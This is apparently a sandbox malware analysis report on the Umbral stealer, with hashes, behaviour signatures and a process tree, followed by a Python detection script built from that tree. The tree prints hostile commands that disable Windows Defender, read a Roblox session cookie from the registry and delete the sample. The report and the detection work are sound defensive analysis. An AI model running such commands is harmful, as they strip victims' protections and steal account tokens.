Analysis

  • max time kernel
    30s
  • max time network
    17s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20250113-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    28/01/2025, 02:55

General

  • Target

    Umbral.exe

  • Size

    230KB

  • MD5

    38b42800e087dcee9961a8e80318d6f2

  • SHA1

    36893cfd322a6021d8048ca6971fc094de6a9f7c

  • SHA256

    44a1693b64e6cb0054ab2d7188af6c9f213ba2a65cf278b6f3857ab462cf30a2

  • SHA512

    5c1d1065e8d076abeabe473f184e7561a2bc9b8b1486b3bff7540e736aa700a93a4879f97f70e176044089ca6eb0462725f26cdd3cb78190de62a62252cb6039

  • SSDEEP

    6144:uloZM+rIkd8g+EtXHkv/iD4K8Nqbw2xpapPyAxVkK6b8e1myui:4oZtL+EP83Nqbw2xpapPyAxVkdXD

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other secrets.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1816
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:4960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:3988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:3148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:64
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3744
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2592
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1836
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious behavior: EnumeratesProcesses
      PID:3408
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:756
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2808
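Detection logic for the behaviour chain recorded in the process tree above (Defender tampering via Add-/Set-MpPreference, attrib +h +s on its own image, WMIC hardware fingerprinting, the .ROBLOSECURITY registry read, and the ping-then-del self-deletion), as an added example that is not part of the tria.ge report or of Umbral itself. The events are constructed from the command lines in the Processes section; the event field names (pid, ppid, image, cmdline) and the placeholder parent PID 900 are assumptions, not report data.

```python
"""Flag a parent process whose children trip several Umbral-style behaviours.

Constructed example; field names mirror Sysmon-style process-creation events
(pid, ppid, image, cmdline) and are an assumption, not the report's schema.
"""
import re
from collections import defaultdict

def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}

UMBRAL = r"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"

# Constructed from the Processes section; ppid 900 stands in for the unseen parent.
EVENTS = [
    ev(1156, 900, UMBRAL, '"' + UMBRAL + '"'),
    ev(1816, 1156, WMIC, '"wmic.exe" csproduct get uuid'),
    ev(4960, 1156, r"C:\Windows\SYSTEM32\attrib.exe", '"attrib.exe" +h +s "' + UMBRAL + '"'),
    ev(3612, 1156, PS, '"powershell.exe" Add-MpPreference -ExclusionPath ' + "'" + UMBRAL + "'"),
    ev(3988, 1156, PS, r'"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true '
                       r'-DisableScriptScanning $true -MAPSReporting Disabled -Force'),
    ev(3148, 1156, PS, r'"powershell.exe" Get-ItemPropertyValue -Path '
                       r'HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY'),
    ev(3744, 1156, WMIC, '"wmic.exe" os get Caption'),
    ev(3408, 1156, WMIC, '"wmic" path win32_VideoController get name'),
    ev(4616, 1156, r"C:\Windows\SYSTEM32\cmd.exe",
       '"cmd.exe" /c ping localhost && del /F /A h "' + UMBRAL + '" && pause'),
    ev(756, 4616, r"C:\Windows\system32\PING.EXE", "ping localhost"),
    ev(2808, 900, r"C:\Windows\system32\taskmgr.exe", '"C:\\Windows\\system32\\taskmgr.exe" /4'),
]

def _norm(path):
    return path.strip("\"'").lower()

def _quoted_args(cmdline):
    # Every single- or double-quoted argument, lower-cased, quotes stripped.
    return [_norm(m) for m in re.findall(r"""["']([^"']+)["']""", cmdline)]

def _is(ev_, exe):
    return ev_["image"].lower().endswith(exe)

def rule_defender_tamper(ev_, parent):
    c = ev_["cmdline"]
    return bool(re.search(r"Add-MpPreference\s+-Exclusion", c, re.I)
                or re.search(r"Set-MpPreference.*-Disable\w+\s+\$true", c, re.I))

def rule_self_hide(ev_, parent):
    # attrib +h +s pointed at the parent's own executable
    c = ev_["cmdline"].lower()
    return _is(ev_, "attrib.exe") and "+h" in c and "+s" in c \
        and _norm(parent) in _quoted_args(ev_["cmdline"])

def rule_self_delete(ev_, parent):
    # cmd.exe chaining ping (a delay) into del of the parent's executable
    c = ev_["cmdline"].lower()
    return _is(ev_, "cmd.exe") and "ping" in c and bool(re.search(r"\bdel\b", c)) \
        and _norm(parent) in _quoted_args(ev_["cmdline"])

HW_QUERIES = ("csproduct get uuid", "win32_videocontroller get name",
              "computersystem get totalphysicalmemory", "os get caption")

def rule_hw_fingerprint(ev_, parent):
    c = ev_["cmdline"].lower()
    return (_is(ev_, "wmic.exe") and any(q in c for q in HW_QUERIES)) \
        or "processor_identifier" in c

def rule_stored_token_read(ev_, parent):
    return ".roblosecurity" in ev_["cmdline"].lower()

RULES = [("defender_tamper", rule_defender_tamper), ("self_hide", rule_self_hide),
         ("self_delete", rule_self_delete), ("hw_fingerprint", rule_hw_fingerprint),
         ("stored_token_read", rule_stored_token_read)]

def detect(events, min_tags=3):
    """Return {parent_pid: sorted tags} for parents whose children trip >= min_tags rules."""
    images = {e["pid"]: e["image"] for e in events}
    tags = defaultdict(set)
    for e in events:
        parent = images.get(e["ppid"])
        if parent is None:          # parent not in the event set: nothing to correlate
            continue
        for tag, rule in RULES:
            if rule(e, parent):
                tags[e["ppid"]].add(tag)
    return {pid: sorted(t) for pid, t in tags.items() if len(t) >= min_tags}

if __name__ == "__main__":
    print(detect(EVENTS))
```

The rules correlate on the parent rather than on any single command line because each child on its own (a wmic query, an attrib call, a ping) is common on a healthy host; requiring several distinct behaviours under one parent, and tying attrib and del to the parent's own image path, is what separates this chain from administrative noise. taskmgr.exe, which the sandbox also ran, produces no tags.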

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    f8e5f7624846b8c5a971591692717cf4

    SHA1

    7505e50af2662ed414e89cec741408f905fa1725

    SHA256

    db7bede3d8817b35e77b01069a0995c55c7f538cb299281eb3d8afe5f5b47611

    SHA512

    bf91013c305fb8281806a9e530c764e0915850675453323b92f217c35fe4b30daf835a14f0db9106669637db59b649ae64fee2bd07dbe3f93ee54cf42ae2cab4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    494de073067224860ddfa87f20c1fcd5

    SHA1

    139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de

    SHA256

    5b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579

    SHA512

    2457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    23177316e5ab500ee9f5e650f688b47e

    SHA1

    d5ba3def42a52e8caa9f92ca7b18d4b08150257f

    SHA256

    af6d0dd4d2a2721405f6b8fcc6acb9fcc99db3311ca4fe6c413348376ea35554

    SHA512

    074f1307c7251546abee94b5645af4a5a51e39eeb4acf47bfdeba89bfe7ba7967bd9fdb4ea611197344f06551409bdcca68d3b58713a93b9c93a181b1b420de6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ucmkoxky.2rl.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1156-59-0x000001E67F940000-0x000001E67F952000-memory.dmp

    Filesize

    72KB

  • memory/1156-0-0x00007FFE43DA3000-0x00007FFE43DA5000-memory.dmp

    Filesize

    8KB

  • memory/1156-58-0x000001E665620000-0x000001E66562A000-memory.dmp

    Filesize

    40KB

  • memory/1156-90-0x000001E600020000-0x000001E6001C7000-memory.dmp

    Filesize

    1.7MB

  • memory/1156-91-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

  • memory/1156-32-0x000001E67F8C0000-0x000001E67F936000-memory.dmp

    Filesize

    472KB

  • memory/1156-33-0x000001E666F20000-0x000001E666F70000-memory.dmp

    Filesize

    320KB

  • memory/1156-34-0x000001E665630000-0x000001E66564E000-memory.dmp

    Filesize

    120KB

  • memory/1156-2-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

  • memory/1156-1-0x000001E665170000-0x000001E6651B0000-memory.dmp

    Filesize

    256KB

  • memory/2808-74-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-84-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-79-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-73-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-75-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-80-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-85-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-81-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-83-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/2808-82-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

  • memory/3612-18-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

  • memory/3612-5-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

  • memory/3612-15-0x000001FAF3E90000-0x000001FAF3EB2000-memory.dmp

    Filesize

    136KB

  • memory/3612-4-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

  • memory/3612-3-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB